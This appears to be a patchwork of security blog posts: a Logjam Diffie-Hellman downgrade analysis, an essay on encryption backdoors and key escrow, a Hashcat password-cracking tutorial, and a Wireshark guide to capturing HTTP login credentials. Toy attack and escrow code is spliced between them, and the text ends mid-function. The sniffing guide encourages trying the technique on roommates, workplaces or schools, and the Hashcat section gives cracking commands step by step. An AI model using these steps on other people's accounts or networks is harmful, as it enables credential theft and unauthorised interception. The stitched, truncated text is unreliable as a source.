The good news here is that the major browsers have decided to break the Internet (a little) rather than allow it to break them. Each has agreed to raise the minimum size limit to at least 768 bits, and some to a minimum of 1024 bits. It's still not perfect, since 1024-bit DHE may not be cryptographically sound against powerful attackers, but it does address the immediate export attack. In the longer term the question is whether to use larger negotiated DHE groups, or abandon DHE altogether and move to elliptic curves.

### What does this mean for larger parameter sizes?

The good news so far is that 512-bit Diffie-Hellman is only used by a fraction of the Internet, even when you account for active downgrade attacks. The vast majority of servers use Diffie-Hellman moduli of length at least 1024 bits. (The widespread use of 1024 is largely due to a hard-cap in older Java clients. Go away Java.)
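Before moving on to larger parameters, here is the downgrade described above, the precomputation/descent split, and the browser-side minimum-size fix, as a runnable toy model. This is an added example and not code from the Logjam paper or from any TLS implementation. Its assumptions: the ServerKeyExchange "signature" is an HMAC under a key the client is taken to trust (a stand-in for the server's RSA signature; what matters is that it covers nonces and parameters but not the ciphersuite); the "strong" and "export" primes are 31 and 20 bits rather than 2048 and 512, so the attacker's discrete log is baby-step giant-step instead of NFS and finishes in milliseconds; the handshake transcript is a fixed string; the Finished MAC is keyed directly with the shared secret.

```python
"""Toy model of the Logjam downgrade (added example; not code from the paper or
from any TLS implementation). Assumptions: the ServerKeyExchange 'signature' is an
HMAC under a key the client trusts (stand-in for the server's RSA signature); the
groups are tiny so the attacker's discrete log is baby-step giant-step instead of
NFS; the handshake transcript is a fixed string."""
import hmac
import math
import secrets

# Constructed groups (assumption): a real DHE prime is 2048+ bits and a real
# export prime 512 bits. Both values below are prime; both are toy-sized.
P_STRONG = 2147483647          # 2^31 - 1
P_EXPORT = 1000003
G = 5
SERVER_SIGNING_KEY = b"server-long-term-key"   # assumption: trusted by the client


def sign(params):
    """Stand-in for the RFC 5246 ServerKeyExchange signature: it covers the
    nonces and the DH parameters only, never the negotiated ciphersuite."""
    return hmac.new(SERVER_SIGNING_KEY, repr(params).encode(), "sha256").digest()


def server_key_exchange(offered_suites, client_random):
    """Server picks DHE-EXPORT only if that is all the client (appears to) offer."""
    suite = "DHE-EXPORT" if offered_suites == ["DHE-EXPORT"] else "DHE"
    p = P_EXPORT if suite == "DHE-EXPORT" else P_STRONG
    a = secrets.randbelow(p - 2) + 1
    params = (client_random, secrets.token_hex(8), p, G, pow(G, a, p))
    return suite, params, sign(params), a


def client_accepts(params, signature, min_dh_bits=0):
    """The pre-Logjam client only verified the signature. The browser fix is
    the extra min_dh_bits check on the received prime."""
    p = params[2]
    return hmac.compare_digest(sign(params), signature) and p.bit_length() >= min_dh_bits


def precompute(p, g):
    """Stage 1, depends only on (p, g): for NFS this is the week of sieving and
    linear algebra; here it is a baby-step table of about sqrt(p) entries."""
    m = math.isqrt(p) + 1
    table = {pow(g, j, p): j for j in range(m)}
    return m, table, pow(g, -m, p)       # g^-m mod p (Python >= 3.8)


def descent(h, p, pre):
    """Stage 2, per connection: recover a with g^a = h (mod p) from the table."""
    m, table, giant = pre
    for i in range(m):
        j = table.get(h)
        if j is not None:
            return i * m + j
        h = h * giant % p
    raise ValueError("no discrete log found")


def finished_mac(shared_secret, transcript):
    return hmac.new(str(shared_secret).encode(), transcript.encode(), "sha256").hexdigest()


def handshake(client_min_bits=0, attacker=True):
    """Return (suite the server negotiated, client accepted?, attacker holds the key?)."""
    client_random = secrets.token_hex(8)
    client_hello = ["DHE", "RSA"]                                # client never offers export
    on_the_wire = ["DHE-EXPORT"] if attacker else client_hello   # ClientHello is unsigned
    suite, params, sig, _ = server_key_exchange(on_the_wire, client_random)
    if not client_accepts(params, sig, client_min_bits):
        return suite, False, False
    p, g, A = params[2], params[3], params[4]
    b = secrets.randbelow(p - 2) + 1
    B = pow(g, b, p)
    client_secret = pow(A, b, p)
    if not attacker:
        return suite, True, False
    # Attacker: precompute once for this (p, g), descend on A, derive the
    # secret from B and forge Finished before the handshake times out.
    a = descent(A, p, precompute(p, g))
    attacker_secret = pow(B, a, p)
    transcript = "ClientHello|ServerHello|ServerKeyExchange|ClientKeyExchange"
    return suite, True, finished_mac(attacker_secret, transcript) == finished_mac(client_secret, transcript)
```

The shape of the attack is visible in `handshake`: the client offered DHE, the server signed something valid, and the only thing that went wrong is that nobody signed which suite was in use. `client_accepts` with a non-zero `min_dh_bits` is the browser fix; in the toy groups a threshold of 24 bits plays the role the 768- or 1024-bit minimum plays for real deployments. Note too that `precompute` is called with `(p, g)` only, which is exactly why shared primes matter: the table is reusable against every server that hands out the same p.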
While 2048-bit moduli are generally believed to be outside of anyone's reach, 1024-bit DHE has long been considered to be at least within groping range of nation-state attackers. We've known this for years, of course, but the practical implications haven't been quite clear. This paper tries to shine some light on that, using Internet-wide measurements and software/hardware estimates.

If you recall from above, the most critical aspect of the NFS attack is the need to perform large amounts of pre-computation on a given Diffie-Hellman prime p, followed by a relatively short calculation to break any given connection that uses p. At the 512-bit size the pre-computation only requires about a week. The question then is, how much does it cost for a 1024-bit prime, and how common are shared primes?

While there's no exact way to know how much the 1024-bit attack would cost, the paper attempts to provide some extrapolations based on current knowledge. With software, the cost of the pre-computation seems quite high: on the order of 35 million core-years. Making this happen for a given prime within a reasonable amount of time (say, one year) would appear to require billions of dollars of computing equipment if we assume no algorithmic improvements. Even if we rule out such improvements, it's conceivable that this cost might be brought down to a few hundred million dollars using custom hardware. This doesn't seem out of bounds when you consider leaked NSA cryptanalysis budgets.

What's interesting is that the descent stage, required to break a given Diffie-Hellman connection, is much faster. Based on some implementation experiments by the CADO-NFS team, it may be possible to break a Diffie-Hellman connection in as little as 30 core-days, with parallelization hugely reducing the wall-clock time. This might even make near-real-time decryption of Diffie-Hellman connections practical.

### Is the NSA actually doing this?
So far all we've noted is that NFS pre-computation is at least potentially feasible when 1024-bit primes are re-used. That doesn't mean the NSA is actually doing any of it. There is some evidence, however, that suggests the NSA has decryption capability that's at least consistent with such a break.

This evidence comes from a series of Snowden documents published last winter in Der Spiegel. Together they describe a large-scale effort at NSA and GCHQ, capable of decrypting 'vast' amounts of Internet traffic, including IPSec, SSH and HTTPS connections.

[Figure: NSA slide illustrating exploitation of IPSec encrypted traffic (source: Spiegel).]

While the architecture described by the documents mentions attacks against many protocols, the bulk of the energy seems to be around the IPSec and IKE protocols, which are used to establish Virtual Private Networks (VPNs) between individuals and corporate networks such as financial institutions.

The nature of the NSA's exploit is never made clear in the documents, but the diagram gives a lot of the architectural details. The system involves collecting Internet Key Exchange (IKE) handshakes, transmitting them to the NSA's Cryptanalysis and Exploitation Services (CES) enclave, and feeding them into a decryption system that controls substantial high performance computing resources to process the intercepted exchanges. This is at least circumstantially consistent with Diffie-Hellman cryptanalysis.

Of course it's entirely possible that the attack is based on a bad random number generator, weak symmetric encryption, or any number of engineered backdoors. There are a few pieces of evidence that militate towards a Diffie-Hellman break, however:

1. IPSec (or rather, the IKE key exchange) uses Diffie-Hellman for every single connection, meaning that it can't be broken without some kind of exploit, although this doesn't rule out the other explanations.
The IKE exchange is particularly vulnerable to pre-computation, since IKE uses a small number of standardized prime numbers called the Oakley groups, which are going on 17 years old now. Large-scale Internet scanning by the Michigan team shows that a majority of responding IPSec endpoints will gladly negotiate using Oakley Group 1 (768 bit) or Group 2 (1024 bit), even when the initiator offers better options.
3. The NSA's exploit appears to require the entire IKE handshake as well as any pre-shared key (PSK). These inputs would be necessary for recovery of IKEv1 session keys, but are not required in a break that involves only symmetric cryptography.
4. The documents explicitly rule out the use of malware, or rather, they show that such malware ('TAO implants') is in use — but that malware allows the NSA to bypass the IKE handshake altogether.

I would stipulate that beyond the Internet measurements and computational analysis, this remains firmly in the category of 'crazy-eyed informed speculation'. But while we can't rule out other explanations, this speculation is certainly consistent with a hardware-optimized break of 768- and 1024-bit Diffie-Hellman, along with some collateral damage to SSH and related protocols.

### So what next?

The paper gives a detailed set of recommendations on what to do about these downgrade attacks and (relatively) weak DHE groups. The website provides a step-by-step guide for server administrators. In short, probably the best long-term move is to switch to elliptic curves (ECDHE) as soon as possible. Failing this, clients and servers should enforce at least 2048-bit Diffie-Hellman across the Internet. If you can't do that, stop using common primes.

Making this all happen on anything as complicated as the Internet will probably consume a few dozen person-lifetimes. But it's something we have to do, and will do, to make the Internet work properly.

Notes:

* There are reasons for this.
Some SSL/TLS ciphersuites (such as the RSA encryption-based ciphersuites) don't use signatures within the protocol, so the only way to authenticate the handshake is to negotiate a ciphersuite, run the key exchange protocol, then use the resulting shared secret to authenticate the negotiation messages after the fact. But SSL/TLS DHE involves digital signatures, so it should be possible to achieve a stronger level of security than this. It's unfortunate that the protocol does not.

## How Do We Build Encryption Backdoors?

They say that history repeats itself, first as tragedy, then as farce. Never has this principle been more apparent than in this new piece by Washington Post reporters Ellen Nakashima and Barton Gellman: 'As encryption spreads, U.S. grapples with clash between privacy, security'. The subject of the piece is a renewed effort by U.S. intelligence and law enforcement agencies to mandate 'backdoors' in modern encryption systems. This is ostensibly a reaction to the mass adoption of strong encryption in smartphones, and a general fear that police are about to lose wiretapping capability they've come to depend on.

This is not the first time we've been here. Back in the 1990s the Federal government went as far as to propose a national standard for 'escrowed' telephone encryption called the 'Clipper' chip. That effort failed in large part because the technology was terrible, but also because — at least at the time — the idea of ordinary citizens adopting end-to-end encryption was basically science fiction. Thanks to the advent of smartphones and 'on-by-default' encryption in popular systems like Apple's iMessage and WhatsApp, Americans are finally using end-to-end encryption at large scale and seem to like it. This is scaring the bejesus out of the powers that be. Hence crypto backdoors.
As you might guess, I have serious philosophical objections to the idea of adding backdoors to any encryption system — for excellent reasons I could spend thousands of words on. But I'm not going to do that. What I'd like to do in this post is put aside my own value judgements and try to take these government proposals at face value.

Thus the question I'm going to consider in this post: Let's pretend that encryption backdoors are a great idea. From a purely technical point of view, what do we need to do to implement them, and how achievable is it?

First some background.

### End-to-end encryption 101

Modern encryption schemes break down into several categories. For the purposes of this discussion we'll consider two: those systems for which the provider holds the key, and the set of systems where the provider doesn't.

We're not terribly interested in the first type of encryption, which includes protocols like SSL/TLS and Google Hangouts, since those only protect data at the link layer, i.e., until it reaches your provider's servers. I think it's fairly well established that if Facebook, Apple, Google or Yahoo can access your data, then the government can access it as well — simply by subpoenaing or compelling those companies. We've even seen how this can work.

The encryption systems we're interested in all belong to the second class — protocols where even the provider can't decrypt your information. This includes:

This seems like a relatively short list, but in practice we're talking about an awful lot of data. The iMessage and WhatsApp systems alone process billions of instant messages every day, and Apple's device encryption is on by default for everyone with a recent(ly updated) iPhone.

### How to defeat end-to-end encryption

If you've decided to go after end-to-end encryption through legal means, there are a relatively small number of ways to proceed. By far the simplest is to simply ban end-to-end crypto altogether, or to mandate weak encryption.
There's some precedent for this: throughout the 1990s, the NSA forced U.S. companies to ship 'export' grade encryption that was billed as being good enough for commercial use, but weak enough for governments to attack. The problem with this strategy is that attacks only get better — but legacy crypto never dies.

Fortunately for this discussion, we have some parameters to work with. One of these is that Washington seems to genuinely want to avoid dictating technological designs to Silicon Valley. More importantly, President Obama himself has stated that "there's no scenario in which we don't want really strong encryption". Taking these statements at face value should mean that we can exclude outright crypto bans, mandated designs, and any modification that has the effect of fundamentally weakening encryption against outside attackers.

If we mix this all together, we're left with only two real options:

1. Attacks on key distribution. In systems that depend on centralized, provider-operated key servers, such as WhatsApp, Facetime, Signal and iMessage,** governments can force providers to distribute illegitimate public keys, or register shadow devices to a user's account. This is essentially a man-in-the-middle attack on encrypted communication systems.
2. Key escrow. Just about any encryption scheme can be modified to encrypt a copy of a decryption (or session) key such that a 'master keyholder' (e.g., Apple, or the U.S. government) can still decrypt. A major advantage is that this works even for device encryption systems, which have no key servers to suborn.

Each approach requires some modifications to clients, servers or other components of the system.

### Attacking key distribution

[Figure: Key lookup request for Apple iMessage. The phone number is shown at top right, and the response at bottom left.]

Many end-to-end encrypted messaging systems, including WhatsApp and iMessage, generate a long-term public and secret keypair for every device you own.
The public portion of this keypair is distributed to anyone who might want to send you messages. The secret key never leaves the device.

Before you can initiate a connection with your intended recipient, you first have to obtain a copy of the recipient's public key. This is commonly handled using a key server that's operated by the provider. The key server may hand back one or multiple public keys (depending on how many devices you've registered). As long as those keys all legitimately belong to your intended recipient, everything works fine.

Intercepting messages is possible, however, if the provider is willing to substitute its own public keys — keys for which it (or the government) actually knows the secret half. In theory this is relatively simple — in practice it can be something of a bear, due to the high complexity of protocols such as iMessage.

[Figure: Key fingerprints.]

The main problem with key distribution attacks is that — unlike a traditional wiretap — substitute keys are at least in theory detectable by the target. Some communication systems, like Signal, allow users to compare key fingerprints in order to verify that each received the right public key. Others, like iMessage and WhatsApp, don't offer this technology — but could easily be modified to do so (even using third party clients). Systems like CONIKS may even automate this process in the future — allowing applications to monitor changes to their own keys in real time as they're distributed by a server.

A final, and salient, feature of the key distribution approach is that it allows only prospective eavesdropping — that is, law enforcement must first target a particular user, and only then can they eavesdrop on her connections. There's no way to look backwards in time. I see this as a generally good thing. Others may disagree.

### Key Escrow

[Figure: Structure of the Clipper 'LEAF'.]
The techniques above don't help much for systems without public key servers. Moreover, they do nothing for systems that don't use public keys at all, the prime example being device encryption. In this case, the only real alternative is to mandate some sort of key escrow.

Abstractly, the purpose of an escrow system is to place decryption keys on file ('escrow' them) with some trusted authority, who can break them out when the need arises. In practice it's usually a bit more complex.

The first wrinkle is that modern encryption systems often feature many decryption keys, some of which can be derived on-the-fly while the system operates. (Systems such as TextSecure/WhatsApp actually derive new encryption keys for virtually every message you send.) Users with encrypted devices may change their password from time to time.

To deal with this issue, a preferred approach is to wrap these session keys up (encrypt them) under some master public key generated by the escrow authority — and to store/send the resulting ciphertexts along with the rest of the encrypted data. In the 1990s Clipper specification these ciphertexts were referred to as Law Enforcement Access Fields, or LEAFs.***

With added LEAFs in your protocol, wiretapping becomes relatively straightforward. Law enforcement simply intercepts the encrypted data — or obtains it from your confiscated device — extracts the LEAFs, and requests that the escrow authority decrypt them. You can find variants of this design dating back to the PGP era. In fact, the whole concept is deceptively simple — provided you don't go farther than the whiteboard.

[Figure: Conceptual view of some encrypted data (left) and a LEAF (right).]

It's only when you get into the details of actually implementing key escrow that things get hairy.
These schemes require you to alter every protocol in your encryption system, at a pretty fundamental level — in the process creating the mother of all security vulnerabilities — but, more significantly, they force you to think very seriously about who you trust to hold those escrow keys.

### Who does hold the keys?

This is the million dollar question for any escrow platform. The Post story devotes much energy to exploring various proposals for doing this. Escrow key management is make-or-break, since the key server represents a universal vulnerability in any escrowed communication system. In the present debate there appear to be two solutions on the table.

The first is to simply dump the problem onto individual providers, who will be responsible for managing their escrow keys — using whatever technological means they deem appropriate. A few companies may get this right. Unfortunately, most companies suck at cryptography, so it seems reasonable to believe that the resulting systems will be quite fragile.

The second approach is for the government to hold the keys themselves. Since the escrow key is too valuable to entrust to one organization, one or more trustworthy U.S. departments would hold 'shares' of the master key, and would cooperate to provide decryption on a case-by-case basis. This was, in fact, the approach proposed for the Clipper chip.

The main problem with this proposal is that it's non-trivial to implement. If you're going to split keys across multiple agencies, you have to consider how you're going to store those keys, and how you're going to recover them when you need to access someone's data. The obvious approach — bring the key shares back together at some centralized location — seems quite risky, since the combined master key would be vulnerable in that moment. A second approach is to use a threshold cryptosystem.
Threshold crypto refers to a set of techniques for storing secret keys across multiple locations so that decryption can be done in place without recombining the key shares. This seems like an ideal solution, with only one problem: nobody has deployed threshold cryptosystems at this kind of scale before. In fact, many of the protocols we know of in this area have never even been implemented outside of the research literature. Moreover, it will require governments to precisely specify a set of protocols for tech companies to implement — this seems incompatible with the original goal of letting technologists design their own systems.

### Software implementations

A final issue to keep in mind is the complexity of the software we'll need to make all of this happen. Our encryption software is already so complex that it's literally at the breaking point. (If you don't believe me, take a look at OpenSSL's security advisories for the last year.) While adding escrow mechanisms seems relatively straightforward, it will actually require quite a bit of careful coding, something we're just not good at.

Even if we do go forward with this plan, there are many unanswered questions. How widely can these software implementations be deployed? Will every application maker be forced to use escrow? Will we be required to offer a new set of system APIs in iOS, Windows and Android that we can use to get this right? Answering each of these questions will result in dramatic changes throughout the OS software stack. I don't envy the poor developers who will have to answer them.

### How do we force people to use key escrow?

Leaving aside the technical questions, the real question is: how do you force anyone to do this stuff? Escrow requires breaking changes to most encryption protocols; it's costly as hell; and it introduces many new security concerns. Moreover, laws outlawing end-to-end encryption software seem destined to run afoul of the First Amendment.
I'm not a lawyer, so don't take my speculation too seriously — but it seems intuitive to me that any potential legislation will be targeted at service providers, not software vendors or OSS developers. Thus the real leverage for mandating key escrow will apply to the Facebooks and Apples of the world. Your third-party PGP and OTR clients would be left alone, for the tiny percentage of the population who uses these tools. Unfortunately, even small app developers are increasingly running their own back-end servers these days (e.g., Whisper Systems and Silent Circle) so this is less reassuring than it sounds.

Probably the big takeaway for encryption app developers is that it might be good to think about how you'll function in a world where it's no longer possible to run your own back-end data transport service — and where other commercial services may not be too friendly to moving your data for you.

### In conclusion

If this post has been more questions than answers, that's because there really are no answers right now. A serious debate is happening in an environment that's almost devoid of technical input, at least from technical people who aren't part of the intelligence establishment. And maybe that by itself is reason enough to be skeptical.

Notes:

* Not an endorsement. I have many thoughts on Telegram's encryption protocols, but they're beyond the scope of this post.
** Telegram is missing from this list because their protocol doesn't handle long term keys at all. Every single connection must be validated in person using a graphical key fingerprint, which is, quite frankly, terrible.
*** The Clipper chip used a symmetric encryption algorithm to encrypt the LEAF, which meant that the LEAF decryption key had to be present inside of every consumer device. This was completely nuts, and definitely a bullet dodged. It also meant that every single Clipper had to be implemented in hardware using tamper resistant chip manufacturing technology. It was a truly awful design.
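As an added example (not from the post and not the Clipper design), here is the public-key LEAF sketched in the escrow section, with the escrow secret held as additive shares by several holders so that decryption happens in place and the master key is never reassembled; the tiny group parameters and the choice of n-of-n additive-share ElGamal as the threshold scheme are my assumptions:

```python
# Added toy example (not from the post): the public-key LEAF the escrow section
# sketches, with the escrow secret held as additive shares by several holders.
# Each holder decrypts "in place" with its own share; the master key x is never
# assembled, which is the property the post contrasts with naive recombination
# and with Clipper's put-the-symmetric-key-in-every-chip design.  The group is
# tiny (p = 1019) for readability; a real deployment would use a 2048-bit-plus
# group or an elliptic curve.  This is ElGamal with n-of-n additive shares, one
# simple instance of threshold decryption, not the post's own construction.
import secrets

P = 1019      # constructed demo value: safe prime, (P - 1) / 2 = 509 is prime
G = 2         # generator of the whole group mod P
Q = P - 1     # order of G; exponents are reduced mod Q


def keygen_shared(n_holders, rng=secrets.randbelow):
    """Each holder draws its own share x_i.  The escrow secret x = sum(x_i) mod Q
    exists only implicitly; the public key y = prod(G^x_i) = G^x is published."""
    shares = [rng(Q) for _ in range(n_holders)]
    y = 1
    for x_i in shares:
        y = y * pow(G, x_i, P) % P
    return shares, y


def wrap_leaf(session_key, y, rng=secrets.randbelow):
    """ElGamal-encrypt a session key (an integer in [1, P-1]) to the escrow
    public key.  The pair (c1, c2) is the LEAF sent alongside the real data."""
    k = rng(Q - 1) + 1          # ephemeral exponent in [1, Q-1]
    c1 = pow(G, k, P)
    c2 = session_key * pow(y, k, P) % P
    return c1, c2


def partial_decrypt(c1, x_i):
    """Run by one holder, using only its own share: d_i = c1^x_i mod P."""
    return pow(c1, x_i, P)


def combine(c2, partials):
    """prod(d_i) = c1^(sum x_i) = c1^x = y^k, so the session key is c2 / y^k.
    Nothing here needed x itself.  pow(d, -1, P) needs Python 3.8+."""
    d = 1
    for d_i in partials:
        d = d * d_i % P
    return c2 * pow(d, -1, P) % P


def naive_recombine(shares):
    """The risky alternative the post warns about: rebuild x in one place.
    Whoever runs this holds the entire master key, if only for a moment."""
    return sum(shares) % Q


def escrow_roundtrip(session_key, n_holders=3, rng=secrets.randbelow):
    """Wrap a session key into a LEAF and recover it by threshold decryption."""
    shares, y = keygen_shared(n_holders, rng)
    c1, c2 = wrap_leaf(session_key, y, rng)
    partials = [partial_decrypt(c1, x_i) for x_i in shares]
    return combine(c2, partials)


if __name__ == "__main__":
    print("recovered session key:", escrow_roundtrip(777))
```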
## Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux

Hashcat or cudaHashcat is the self-proclaimed world's fastest CPU-based password recovery tool. Versions are available for Linux, OSX, and Windows and can come in CPU-based or GPU-based variants. Hashcat or cudaHashcat currently supports a large range of hashing algorithms, including: Microsoft LM Hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, Cisco PIX, and many others.

Hashcat or cudaHashcat comes in two main variants:

1. Hashcat – A CPU-based password recovery tool
2. oclHashcat or cudaHashcat – A GPU-accelerated tool

Many of the algorithms supported by Hashcat or cudaHashcat can be cracked in a shorter time by using the well-documented GPU-acceleration leveraged in oclHashcat or cudaHashcat (such as MD5, SHA1, and others). However, not all algorithms can be accelerated by leveraging GPUs. Hashcat or cudaHashcat is available for Linux, OSX and Windows. oclHashcat or cudaHashcat is only available for Linux and Windows due to improper implementations of OpenCL on OSX.

### My Setup

My setup is simple. I have an NVIDIA GTX 210 graphics card in my machine running Kali Linux 1.0.6 and will use the rockyou dictionary for this whole exercise. In this post, I will show how to crack a few of the most common hashes:

1. MD5
2. MD5 – phpBB
3. MySQL and
4. SHA1

I will use 2 commands for every hash, hashcat and then cudahashcat. Because I am using an NVIDIA GPU, I get to use cudaHashcat. If you're using an AMD GPU, then I guess you'll be using oclHashcat. Correct me if I am wrong here! AMD is currently much faster in terms of GPU cracking, but then again it really depends on your card.

You can generate more hashes or collect them and attempt to crack them. Because I am using a dictionary (it's just 135MB), I am limited to a small selection of passwords. The bigger your dictionary is, the more success you'll have cracking an unknown hash.
There are other ways to crack them without using a dictionary (such as rainbow tables etc.). I will try to cover and explain as much as I can. Advanced users, I'm sure you already know these, so I would appreciate constructive comments. As always, read the manual and help file before you ask for help. Most of the things are covered in the manuals and wiki available at www.hashcat.net. A big thanks goes to the Hashcat or cudaHashcat dev team, they are the ones who created and maintained this so well. Kudos!

### Getting hashes

First of all, we need to get our hashes. You can download hash generator applications, but there are online sites that will allow you to create them. I will use InsidePro, who kindly created a page that allows you to create hashes on the fly and it's publicly available. Visit them and feel free to browse their website to understand more about hashes.

The password I am using is simple: abc123

All you need to do is enter this in the password field of this page http://www.insidepro.com/hashes.php and click on generate.

### Cracking hashed MD5 passwords

From the site, I copied the MD5 hashed password and put it into a file.

vi md5-1.txt
cat md5-1.txt

#### MD5 cracking using hashcat and cudahashcat

Now it's simple, I just typed in the following command and it took a few seconds.

hashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt

Similarly, I can use cudahashcat.

cudahashcat -m 0 -a 0 /root/md5-1.txt /root/rockyou.txt

### Cracking hashed MD5 – phpBB passwords

From the site, copy the phpBB hashed password and put it into a file.

vi md5phpbb-1.txt
cat md5phpbb-1.txt

What I didn't explain in the previous section is how you know which mode to use or which attack code. You can type in hashcat --help or cudahashcat --help and read through it. Because I will stick with attack mode 0 (Straight Attack Mode), I just need to adjust the value for -m, where you specify which type of hash it is.
hashcat --help | grep php

So it's 400.

#### MD5 – phpBB cracking using hashcat and cudahashcat

Let's adjust our command and run it.

hashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt

and cudahashcat

cudahashcat -m 400 -a 0 /root/md5phpbb-1.txt /root/rockyou.txt

### Cracking hashed MySQL passwords

Similar step, we get the hash from the website and stick that into a file.

vi mysql-1.txt
cat mysql-1.txt

NOTE: *6691484EA6B50DDDE1926A220DA01FA9E575C18A <– this was the hash from the website; remove the * from this one before you save this hash.

First of all let's find out the mode we need to use for MySQL password hashes.

hashcat --help | grep My

Ah, I'm not sure which one to use here …

#### MySQL hashed password cracking using hashcat and cudahashcat

I'll try 200 and see how that goes …

hashcat -m 200 -a 0 /root/mysql-1.txt /root/rockyou.txt

Nope, not good. Let's try 300 this time…

hashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt

and cudahashcat

cudahashcat -m 300 -a 0 /root/mysql-1.txt /root/rockyou.txt

### Cracking hashed SHA1 passwords

Similar step, we get the hash from the website and stick that into a file.

vi sha1-1.txt
cat sha1-1.txt

Let's find out the mode we need to use for SHA1 password hashes.

hashcat --help | grep SHA1

#### SHA1 password cracking using hashcat and cudahashcat

We already know what to do next…

hashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt

and cudahashcat

cudahashcat -m 100 -a 0 /root/sha1-1.txt /root/rockyou.txt

### Location of Cracked passwords

Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you've run Hashcat or cudaHashcat or oclHashcat from. In my case, I've run all commands from my home directory, which is the /root directory.

cat hashcat.pot

### Creating HASH'es using Kali

As always, great feedback from zimmaro, thanks. See his comment below: (I've removed IP and email details for obvious reasons). Dude got some massive screen!!! 1920×1080 16:9 HD 1080p!!!
zimmaro_the_g0at
Submitted on 2014/03/30 at 2:43 am

all always (our-friend): excellent explanation and thank you for sharing your knowledge / experiences
PS: if I may, some "basic-hash" can be generated directly with our KALI
http://www.imagestime.com/show.php/936022_hash.PNG.html

### Conclusion

This guide is here to show you how you can crack passwords using simple attack mode. You might ask why I showed the same command over and over again! Well, by the end of this guide, you will never forget the basics. There's of course advanced usage, but you need to have strong basics. I would suggest reading the wiki and manuals from www.hashcat.net to get a better understanding of rule based attacks, because that's the biggest strength of Hashcat. The guys in the Hashcat forums are very knowledgeable and know what they are doing. If you need to know anything, you MUST read the manuals before you go and ask something. Usually RTFM is the first response … so yeah, tread lightly. Thanks for reading. Feel free to share this article.

## Website Password & User Credentials Sniffing/Hacking Using WireShark

Did you know that every time you fill in your username and password on a website and press ENTER, you are sending your password? Well, of course you know that. How else are you going to authenticate yourself to the website?? But (yes, there's a small BUT here)... when a website allows you to authenticate using HTTP (plaintext), it is very simple to capture that traffic and later analyze it from any machine over the LAN (and even the Internet). That brings us to this website password hacking guide, which works on any site that is using the HTTP protocol for authentication. Well, to do it over the Internet, you need to be able to sit on a gateway or central hub (BGP routers would do, if you've got access and the traffic is routed via them). But to do it from a LAN is easy and at the same time makes you wonder how insecure HTTP really is.
You could be doing this to your roommate, work network or even school, college, or university network, assuming the network allows broadcast traffic and your LAN card can be set to promiscuous mode. So let's try this on a simple website. I will hide part of the website name (just for the fact that they are nice people and I respect their privacy). For the sake of this guide, I will just show everything done on a single machine. As for you, try it between two VirtualBox/VMWare/physical machines.

p.s. Note that some routers don't broadcast traffic, so it might fail for those particular ones.

## Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a wireless USB card, so I've selected wlan0.

Ideally you could just press the Start button here and Wireshark will start capturing traffic. In case you missed this, you can always capture traffic by going back to Capture > Interface > Start

## Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing it. I opened a browser and signed in to a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.

Usually you see a lot of data in Wireshark. However, we are only interested in POST data.

### Why POST only?

Because when you type in your username and password and press the Login button, it generates a POST method (in short – you're sending data to the remote server). To filter all traffic and locate POST data, type in the following in the filter section:

http.request.method == "POST"

See screenshot below. It is showing 1 POST event.
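An added example (not part of this guide): a small auditor that reads one captured HTTP login exchange and reports the weaknesses such a POST exposes, so the same check can be run over your own application's traffic. The request text is constructed, the response headers follow the ones this guide captures, and the credential field names and finding strings are my assumptions:

```python
# Added example (not part of the original post): an auditor for a captured HTTP
# login exchange that reports the weaknesses this kind of capture exposes.  It
# returns findings (field and cookie names, never values), so it can run as a
# check over your own application's traffic rather than as a credential grabber.
# The request below is constructed; the response headers follow the ones this
# guide shows in the Follow TCP Stream window.
import re
from urllib.parse import parse_qs

CREDENTIAL_NAMES = {"password", "passwd", "pass", "pwd"}   # assumed field names

SAMPLE_REQUEST = (                       # constructed login POST over plain HTTP
    "POST /login.php HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 43\r\n"
    "\r\n"
    "username=sampleuser&password=simplepassword"
)
SAMPLE_RESPONSE = (                      # server reply as captured in the guide
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/\r\n"
    "Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; "
    "expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/\r\n"
    "Set-Cookie: scifuser=sampleuser; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/\r\n"
    "Location: loggedin.php\r\n"
    "\r\n"
)


def hash_shape(value):
    """Length-based guess for an unsalted hex digest, the same reasoning
    hash-identifier applies (these map to hashcat -m 0 and -m 100)."""
    if re.fullmatch(r"[0-9a-fA-F]{32}", value):
        return "MD5-sized (32 hex)"
    if re.fullmatch(r"[0-9a-fA-F]{40}", value):
        return "SHA1-sized (40 hex)"
    return None


def split_message(raw):
    """Return (start line, [(header name, value)], body) for one HTTP message."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def audit_exchange(request, response, over_tls=False):
    """Findings for a request/response pair.  over_tls=False means the capture
    came from plaintext HTTP, as in this guide."""
    findings = []
    start, _, body = split_message(request)
    if start.split()[0] == "POST" and not over_tls:
        for field in parse_qs(body):
            if field.lower() in CREDENTIAL_NAMES:
                findings.append(f"credential field '{field}' POSTed over plaintext HTTP")
    _, headers, _ = split_message(response)
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie, _, attr_text = value.partition(";")
        cname, _, cvalue = cookie.partition("=")
        attrs = {a.strip().split("=")[0].lower() for a in attr_text.split(";") if a.strip()}
        if cname.lower() in CREDENTIAL_NAMES:
            findings.append(f"cookie '{cname}' carries a credential")
            shape = hash_shape(cvalue)
            if shape:
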